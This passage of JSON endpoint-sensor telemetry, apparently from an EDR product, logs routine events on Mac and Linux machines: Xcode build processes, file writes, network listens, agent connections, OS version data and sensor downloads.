16b1ba66e57d3d0e0c9e3f7dbf483dd1b7173c1435ad3f34bc6a3ef096bc4003689d3c49afe23b22fcf0bb87a8d63cde939f3e1aee633bedbb5a3b14f69d3c91e6473c402f303b64217d3d06cca33d183516ba9fe8683b33d4ae3c38f9b13cced9173b288f00ba5a42d7356eda97bcb9628d356e0c6f341b95cf341f3c6534ad5b0a32a151a8337b157335b2c72cbbb2852334900adf34553ec1346e5ee5347ab7febba8e2e3bc4df26733a7cdeb35cf19143592f7ea34c9a612be173eabbc11e647bbb3d4ae35219fff33b7f4153046530d348b7aa434677fadbcf290acbbaf2d80bc46690535a6b2cc3206f2a8af17834033a03ec7338e0e59bd1e83e435857ac3bd2bb44e33043df73927249d34bb34f735906b14bb780dc33c50e560361e0a98336f92c2320a0eb4bc19b2c435adf23935ab6563b85a4586bcc56d5d3510d9083490265c3399a707bc811b1e34cde3d7bba593a334aec0612fb676c6bd13be2333605e7dbca3ec033d59be4d3dc9667b3db83cf33ca7ef9e3d5c09813e8361133cdba0a53f485f073ba023213d191bc53e69fbe73c4059213f04dd2f3c9835163e0865953be38a7e3d0385c63ee1b08a3f142c3d3e2f9db23df0068e3cff6d333df06f693d9e7ea63b68fb013c4250723d8a4d2b3c0b007a3d2e924f3cea209b3d094c443faccccd3f50ded32e0d9dfa3df41f213b2dab9f3cf95d4f3d94a4d33d7991bc3de809d53eb532613e28db8c3c1afe1e3f7cd9e83eb0ff974010f0d83cfc3b4f3c2e53653b0ede553db6c3763e6bb98c3d35f1bf3d1a95423c53d85a3bcedd483c46bce83ded5cfb3d8ac0833bd0edc43c319a413d1e30013dd07c853cdcf0303ce243573f4ded293f69c77a3f13d70a3f036e2f3f036e2f3feaa3053e361134404d8c7e3df5c28f3ef02de03faa57a83e70d845402f5dcc3eb8e2193f62339c3df0068e3f204189400de9e23fe010623f90be0e3f6a233a3e7333333f4a85883f3318fc3e4000003e063f143f1b851f3ecb5dcc3e9333333ed446743f0e560440889ba64065d2f2ad8f49d23f573eab3dbeff193ed7f62b3f3f3b643eedab9f3f57d567409780343f9292a33e8395814041158c3f90a71e40d717593e832ca53e1a511a3c74c6e73f64c2f83f832cf93f26e9793f03a92a3e6872b03df34d6a3e884b5e3f3381d83ea20c4a3e1a02753e2353f83e825aee3f4d013b3f041f213ec240b83c6a4a8c3cf3a14d3d15b5743c091e213d059c8d3e08ce703c2f78ff3f0837b53b6a7ce13b815e393ded91683ba9cdc43e2d42c43b73dc053d6147aebb8438093c0a61173ea72b023edf559b3dcaff6dbc1bd4063c21fd153d39ffd63d128e0d398d4bad3b894c443d4f18013a195aafbc5773193af57f7339ce41413f6851ec3f0fec57ae9dfa533cfa58f73a5a0d27bc21943a3ca1dfb9ba5471063d0e56043f7dd2f23dd1b7173c14b3813f33dd983ef013a9400347d83c4ca2db3b245d42bb8733663ce243573e1b22d13bf47b673b0f32383c928e0d3c4059213b6304473d05143c3d176ddbba9aed573b3220793c3c6a7f3ccc4ef93b267621ba298e0334f8d6f4bcba493d35461af9342ca85e34c11ccb352222903385f5c5368e9b3935b2c72cbbb75ea6344cfa3134553ec134b523e734c2b91cbba8e2e3bc4df26734d636243705eeb9351ad56535332082be173eabbc11ea79bbb3d4ae35a82cc133a943c13046530d34fd74ee34677fadbcf27bb3bbad8a11bc4669053496f7d53580f4d6af1848493405e546338e0e59bd23ad193400bddcbd2bb44e33bf0a473927249d34c2822235531fdebb73ba773c626d4836cf4407330f9fab31d582ecbc1a027535b8af0035d13ed5b85ad11cbcc582563573cb0735d499d3319cda2abc8548aa3474d02abba593a3351ccb0c2f713b9cbd14a4d333605e7dbca3ec033d6108c43dc9e4503dba34443ca454de3d5a511a3e84816f3cdc09813f4773193bac3a863d1945b73e6b1c433c48de2b3f03e4263c9a415f3e08b4393bd8ba413d0073583ee1cac13f13a92a3e2e48e93df318fc3d0216c63df212d73d9d7dbf3b627e0f3c44ef893d8ba1f53c03e8573d2c9afe3ce5f30e3d0846203fac710d3f50c49c2e0d4f2a3df487fd3b306c443cf837b53d96ffc13d795d4f3de8db8c3eb4bc6a3e28a71e3c1fba453f7c56d63eb07c854010c63f3cfeb0753c3170503b0e68e43db977853e6bb98c3d3c7f783d19a4163c55f99c3bd1e96c3c4669053debb98c3d8a6ca03bde43ee3c2efb2b3d2007dd3dce075f3cdbb59e3ce75793b01aa501","event_simpleName":"DeliverLocalFXToCloud","ConfigStateHash":"1620585913","aip":"208.237.139.168","ModelPrediction":"1436899696705536","SHA256HashData":"c89caf538788e6524bf4ae93194051f3389eecbc71e4793f12a2dc0368211cc2","Malicious":"0","ConfigBuild":"1007.4.0013701.1","FeatureExtractionVersion":"2","event_platform":"Mac","FXFileSize":"502032","Entitlements":"15","name":"DeliverLocalFXToCloudMacV4","PupAdwareDecisionValue":"12384657383358464","id":"ffffffff-1111-11eb-b44e-069a02b0ad6b","PupAdwareConfidence":"0","EffectiveTransmissionClass":"1","aid":"ffffffff45d647e6ae0ba8764a4bd570","MLModelVersion":"4","timestamp":"1625677489052","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"CreateProcessArgs","ContextTimeStamp":"1625677524.929","ConfigStateHash":"3090255842","ContextProcessId":"365035560818271291","ContextThreadId":"365035560818271291","aip":"208.114.159.32","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","CommandLine":"t.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/CategorySurfaceViewController.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationActionView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationAddressView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationErrorView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationHeaderView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationLoadingView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationPostalCodeView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationViewController.o -index-store-path /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Index/DataStore -index-system-modules","Entitlements":"15","name":"CreateProcessArgsMac","id":"ffffffff-1111-11eb-8332-020506b18db5","EffectiveTransmissionClass":"2","aid":"ffffffffb3a3442585c05abc61e290fc","timestamp":"1625677525128","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/swift-frontend"} -{"event_simpleName":"PdfFileWritten","ContextTimeStamp":"1625677488.523","ConfigStateHash":"3090255842","ContextProcessId":"364156540965623394","ContextThreadId":"0","aip":"208.15.11.8","FileIdentifier":"05000001000000000000000000000000f1321d0000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"PdfFileWrittenMacV1","id":"ffffffff-1111-11eb-8903-022a1941b91f","EffectiveTransmissionClass":"2","aid":"ffffffffc4044541995bffd84b9df003","timestamp":"1625677488576","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/pt/s9pzbbwd07q_0fxqvfhc513r0000gp/T/com.microsoft.Excel/Content.MSO/mso6ACABA95"} -{"event_simpleName":"GroupIdentity","GID":"242","AuthenticationUuidAsString":"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2","ConfigStateHash":"3967242894","aip":"208.165.30.176","AuthenticationId":"1119489580471877843","UserPrincipal":"user2@dom1","UserSid":"S-1-5-21-3852557355-3178143607-2040168074-1485","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"GroupIdentityMacV2","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","AuthenticationUuid":"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2","timestamp":"1625677478379","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"MachOFileWritten","ContextTimeStamp":"1625622611.845","ConfigStateHash":"3967242894","MachOSubType":"3","ContextProcessId":"364938429384226082","Size":"0","ContextThreadId":"0","aip":"208.165.30.176","SHA256HashData":"c0f50d27fe9fb31e33d1ce6577eeb4d4e17639095ad20575da018d1fcf955198","FileIdentifier":"04000001000000000000000000000000ac41270400000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"MachOFileWrittenMacV3","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677479336","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/bf/dwpvdj3d1tq00l8fgs5rd7x00000gn/T/.net.example.desktop.ev80yl"} -{"event_simpleName":"NetworkListenIP6","ContextTimeStamp":"1625622608.014","LocalAddressIP6":"0:0:0:0:0:0:0:0","RemoteAddressIP6":"0:0:0:0:0:0:0:0","ConfigStateHash":"3967242894","ConnectionFlags":"0","ContextProcessId":"364938390018585510","RemotePort":"0","aip":"208.165.30.176","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"8770","Entitlements":"15","name":"NetworkListenIP6MacV10","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff44564c2f8d76394cb25c31ab","ConnectionDirection":"2","InContext":"0","timestamp":"1625677478929","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"CurrentSystemTags","ConfigStateHash":"3090255842","aip":"208.87.57.118","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","SystemTableIndex":"0","Entitlements":"15","name":"CurrentSystemTagsMacV1","id":"ffffffff-1111-11eb-b88d-06b7cb0d7bd7","EffectiveTransmissionClass":"0","aid":"ffffffff62714a708030d494ca0a7e60","Tags":"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584","timestamp":"1625677502693","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"NewExecutableWritten","ContextTimeStamp":"1625677533.027","ConfigStateHash":"1620585913","ContextProcessId":"362208380891022165","Size":"596224","ContextThreadId":"0","aip":"208.24.116.10","SHA256HashData":"70a06a11057efb22285a7200a53e5b6bae001fe0a98d4b23d0f6a31ad818a005","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NewExecutableWrittenMacV2","id":"ffffffff-1111-11eb-985c-02152dd35bc1","EffectiveTransmissionClass":"2","aid":"ffffffff28414c2293e35c360213e723","timestamp":"1625677533060","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.CVG7Ya/Zoom.app/Contents/MacOS/app_mode_loader","VnodeModificationType":"0"} -{"event_simpleName":"LfoUploadDataComplete","LfoUploadFlags":"4","AttemptNumber":"0","ConfigStateHash":"3090255842","SourceFileName":"/Users/user5/.rbenv/versions/2.6.5/bin/ruby","Size":"3876424","aip":"208.137.65.223","SHA256HashData":"d7b56e2a06304ecd343985a1aaedff2eb32ee1151bba0e152aff97c778b7562a","UploadId":"8023668629276690295","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LfoUploadDataCompleteMacV3","id":"ffffffff-1111-11eb-a2ab-024aafff599f","EffectiveTransmissionClass":"2","aid":"fffffffffbea48169985c2c2bae89d1d","Tags":"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584","timestamp":"1625677428827","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"LightningLatencyInfo","LightningLatencyState":"3","ConfigStateHash":"3090255842","aip":"208.100.38.84","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LightningLatencyInfoMacV1","id":"ffffffff-1111-11eb-b44e-069a02b0ad6b","EffectiveTransmissionClass":"0","aid":"ffffffffd452449b8d1eb7d85b146650","timestamp":"1625677453146","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"NeighborListIP4","ConfigStateHash":"1620585913","NeighborList":"40-C7-29-FF-FF-FF|192.168.2.1|1|64-9A-BE-FF-FF-FF|192.168.2.10|0|F0-FF-FF-FF-A0-14|192.168.2.43|0|DE-58-FF-FF-5D-3B|192.168.2.113|0|5E-AA-FF-FF-FF-20|192.168.2.128|0|44-FF-FF-FF-03-DD|192.168.2.136|0|EE-74-EE-EE-FF-0D|192.168.2.137|0|3A-FF-FF-FF-03-26|192.168.2.144|0|DE-79-FF-FF-FF-D4|192.168.2.145|0|0E-24-FF-EE-EE-87|192.168.2.152|0|CC-D9-AC-AF-66-F8|192.168.2.153|0|","aip":"208.93.56.66","InterfaceIndex":"6","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NeighborListIP4MacV1","id":"ffffffff-1111-11eb-9dc0-06c6f5278873","EffectiveTransmissionClass":"3","aid":"ffffffff8eb649cf8d82be1e65629a0e","timestamp":"1625677450083","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"ZipFileWritten","ContextTimeStamp":"1625677454.557","ConfigStateHash":"3090255842","ContextProcessId":"365039419134863763","ContextThreadId":"0","aip":"208.70.175.112","FileIdentifier":"07000001000000000000000000000000b1445a0900000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ZipFileWrittenMacV1","id":"ffffffff-1111-11eb-ab6e-0668ec51180b","EffectiveTransmissionClass":"2","aid":"ffffffff2d984e32b702789b54f0f811","timestamp":"1625677454723","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user6/Library/Developer/CoreSimulator/Devices/BCE6B46B-E863-4151-AA9D-D71C79438C47/data/Containers/Data/Application/1249A061-F246-4338-AE56-4373E918C9B4/Library/Application Support/com.instacart.instashopper/LogCache/2021-07-06T23:44:46.133Z.zip"} -{"AgentVersion":"6.24.13701.0","aip":"208.180.129.90","ConfigIDBase":"65994753","BiosReleaseDate":"01/06/2021","CpuFeaturesMask":"7494065083858915","ChasisManufacturer":"Apple Inc.","SystemSerialNumber":"C02F649EMD6R","event_platform":"Mac","AgentLoadFlags":"0","CpuVendor":"0","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","BiosVersion":"1554.80.3.0.0 (iBridge: 18.16.14347.0.0,0)","CpuSignature":"591594","EffectiveTransmissionClass":"0","MoboProductName":"Mac-E1008331FDC96864","timestamp":"1625677460451","MicrocodeSignature":"16045690984229358334","event_simpleName":"AgentOnline","ContextTimeStamp":"1625677445.731","SystemProductName":"MacBookPro16,1","MoboManufacturer":"Apple Inc.","ConfigStateHash":"3967242894","ConfigBuild":"1007.4.0013701.1","SystemSku":" ","SensorGroupingTags":"","ConfigurationVersion":"10","AgentLocalTime":"1625677445.731","BiosManufacturer":"Apple Inc.","Entitlements":"15","name":"AgentOnlineMacV13","ConfigIDPlatform":"4","ComputerName":"comp2","ChassisType":"9","ConfigIDBuild":"13701","SystemManufacturer":"Apple Inc.","aid":"ffffffffbea440b9aad8b5bf222d303f","ProvisionState":"1","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"Zero"} -{"event_simpleName":"CriticalFileAccessed","ContextTimeStamp":"1625677438.515","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"365053399098988534","ContextThreadId":"0","aip":"208.93.153.49","ConfigBuild":"1007.4.0013701.1","UID":"0","event_platform":"Mac","UnixMode":"384","Entitlements":"15","name":"CriticalFileAccessedMacV1","id":"ffffffff-1111-11eb-956a-02748d01bd3d","EffectiveTransmissionClass":"2","aid":"ffffffff8eca418b7a861be9c5f7de1d","timestamp":"1625677438553","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/dslocal/nodes/Default/users/daemon.plist"} -{"MajorVersion":"19","event_simpleName":"OsVersionInfo","OSVersionFileData":"3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0a3c21444f435459504520706c697374205055424c494320222d2f2f4170706c652f2f44544420504c49535420312e302f2f454e222022687474703a2f2f7777772e6170706c652e636f6d2f445444732f50726f70657274794c6973742d312e302e647464223e0a3c706c6973742076657273696f6e3d22312e30223e0a3c646963743e0a093c6b65793e50726f647563744275696c6456657273696f6e3c2f6b65793e0a093c737472696e673e3139483532343c2f737472696e673e0a093c6b65793e50726f64756374436f707972696768743c2f6b65793e0a093c737472696e673e313938332d32303231204170706c6520496e632e3c2f737472696e673e0a093c6b65793e50726f647563744e616d653c2f6b65793e0a093c737472696e673e4d6163204f5320583c2f737472696e673e0a093c6b65793e50726f647563745573657256697369626c6556657273696f6e3c2f6b65793e0a093c737472696e673e31302e31352e373c2f737472696e673e0a093c6b65793e50726f6475637456657273696f6e3c2f6b65793e0a093c737472696e673e31302e31352e373c2f737472696e673e0a093c6b65793e694f53537570706f727456657273696f6e3c2f6b65793e0a093c737472696e673e31332e363c2f737472696e673e0a3c2f646963743e0a3c2f706c6973743e0a","ConfigStateHash":"3967242894","AgentVersion":"6.24.13701.0","aip":"208.180.129.90","MinorVersion":"6","OSVersionString":"Darwin Kernel Version 19.6.0: Tue Jan 12 22:13:05 PST 2021; root:xnu-6153.141.16~1/RELEASE_X86_64","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"OsVersionInfoMacV3","RFMState":"0","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","OSVersionFileName":"/System/Library/CoreServices/SystemVersion.plist","EffectiveTransmissionClass":"2","aid":"ffffffffbea440b9aad8b5bf222d303f","timestamp":"1625677462356","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"ConfigBuild":"1007.8.0010912.1","event_simpleName":"ConfigStateUpdate","event_platform":"Lin","ConfigStateHash":"1284133626","ConfigStateData":"0,0,1007.8.0010912.1|1,c,0|1,10,1|1,11,0|1,12,1|1,13,1|1,14,19|1,15,3|1,1f,4|1,22,3|1,3b,1|1,59,2d|1,d3,263|1,d4,0|1,eb,36|1,201,1|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|","name":"ConfigStateUpdateLinV1","aip":"208.233.129.250","id":"ffffffff-1111-11eb-8e88-068a8894a447","aid":"ffffffff4f4044b689d6420d303e4ecd","timestamp":"1625677436454","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"LFODownloadConfirmation","ConfigStateHash":"1333055909","aip":"208.203.151.21","DownloadServer":"lfodown01-b.cloudsink.net","DownloadPath":"/osfm/linux/bde98295e6e5fa4c6ba2acfebc2e9943c836bf2223aebb8b29e03c44df43cb53","DownloadPort":"443","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"LFODownloadConfirmationLinV1","CompletionEventId":"Event_KmaExtDownloadCompleteLinV1","id":"ffffffff-1111-11eb-8dee-0201f64cca29","aid":"ffffffff88b948c6abeeee910f6d8c33","timestamp":"1625677365906","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"KernelModuleArchiveExt11611"} -{"event_simpleName":"TarFileWritten","ContextTimeStamp":"1625677353.633","ConfigStateHash":"3090255842","ContextProcessId":"365049009681176519","ContextThreadId":"0","aip":"208.23.66.52","FileIdentifier":"050000010000000000000000000000005749420100000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"TarFileWrittenMacV1","id":"ffffffff-1111-11eb-9497-028a0bfcf603","EffectiveTransmissionClass":"2","aid":"ffffffffe6244708bd09a6c111f63f4a","timestamp":"1625677353895","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user7/.rbenv/versions/2.6.6/lib/ruby/gems/2.6.0/cache/database_cleaner-1.8.5.gem"} -{"event_simpleName":"AgentConnect","ConfigStateHash":"3967242894","NetworkContainmentState":"0","VerifiedCertificate":"7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf","aip":"208.42.18.78","ConfigIDBase":"65994753","FailedConnectCount":"404","ConnectType":"1","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","ConfigurationVersion":"10","Entitlements":"15","name":"AgentConnectMacV5","ConfigIDPlatform":"4","PreviousConnectTime":"1625673963.331","id":"ffffffff-1111-11eb-ba54-02a3616f6acd","ConfigIDBuild":"13701","ConnectTime":"1625677350.208","EffectiveTransmissionClass":"2","aid":"ffffffff2977460db2898ece881a9358","ProvisionState":"0","timestamp":"1625677350466","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"LFODownloadConfirmation","ConfigStateHash":"3090255842","aip":"208.25.66.51","DownloadServer":"lfodown01-b.cloudsink.net","DownloadPath":"metahash+/cfs/channelfiles/0000000503/66d5e9ea15754bcfb5f9152ec7ac90ac/C-00000503-00000000-00000001.sys","DownloadPort":"443","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LFODownloadConfirmationMacV1","CompletionEventId":"Event_ChannelDataDownloadCompleteMacV1","id":"ffffffff-1111-11eb-8b09-069ee8920171","EffectiveTransmissionClass":"0","aid":"ffffffff5e8b4724aa10088c4f71cd9a","timestamp":"1625677525235","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"C-00000503-00000000-00000001.sys"} -{"event_simpleName":"AsepFileChange","ContextTimeStamp":"1625677482.148","ConfigStateHash":"1620585913","ContextProcessId":"364936256754041721","ContextThreadId":"0","aip":"208.140.108.235","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"AsepFileChangeMacV1","id":"ffffffff-1111-11eb-9e50-064be6e56df7","EffectiveTransmissionClass":"2","aid":"fffffffff1a64286a233d09974b1b377","timestamp":"1625677482403","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/System/Library/AssetsV2/com_apple_MobileAsset_MacSoftwareUpdate/5968e4faeba359dd5270ac282340cc4bd94d348c.asset/AssetData/payloadv2/ecc_data/System/Library/Spotlight/SystemPrefs.mdimporter/Contents/MacOS/SystemPrefs","VnodeModificationType":"6"} -{"event_simpleName":"TerminateProcess","RawProcessId":"76482","ContextTimeStamp":"1625677510.959","ConfigStateHash":"1284133626","ContextProcessId":"130732827553316","ContextThreadId":"0","aip":"208.194.125.248","ConfigBuild":"1007.8.0010912.1","event_platform":"Lin","TargetProcessId":"130732827553316","Entitlements":"15","name":"TerminateProcessLinV2","id":"ffffffff-1111-11eb-97d0-02b2813216eb","EffectiveTransmissionClass":"2","aid":"ffffffffdd094539a02b394c69a70aaf","timestamp":"1625677511067","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"ConfigBuild":"1007.4.0013701.1","event_simpleName":"FirewallEnabled","event_platform":"Mac","ConfigStateHash":"3090255842","Entitlements":"15","name":"FirewallEnabledMacV1","aip":"208.31.114.187","id":"ffffffff-1111-11eb-a9e6-067d21325a03","EffectiveTransmissionClass":"2","aid":"ffffffff70cf4070af024397f25007c7","timestamp":"1625677372544","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"FsVolumeUnmounted","VolumeName":"Install Google Drive","ContextTimeStamp":"1625677332.283","ConfigStateHash":"3090255842","aip":"208.105.245.7","VolumeMediaBSDName":"disk2s2","VolumeMountPoint":"/private/tmp/KSInstallAction.dn6J5Xa1M4/m","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"FsVolumeUnmountedMacV1","id":"ffffffff-1111-11eb-8fd9-06866dcbd3d5","EffectiveTransmissionClass":"2","aid":"ffffffffed984e248973f3ada1eb543d","timestamp":"1625677334451","cid":"ffffffff15754bcfb5f9152ec7ac90ac","VolumeIsNetwork":"0"} -{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkListenIP4","ContextTimeStamp":"1625677474.525","ConfigStateHash":"2300098580","ConnectionFlags":"0","ContextProcessId":"328911864662804336","RemotePort":"0","aip":"208.231.69.37","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"23165","Entitlements":"15","name":"NetworkListenIP4LinV5","id":"ffffffff-1111-11eb-88fd-06a17d0fdc05","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff2a0d484da8f7a9cf8bde7164","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677474879","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 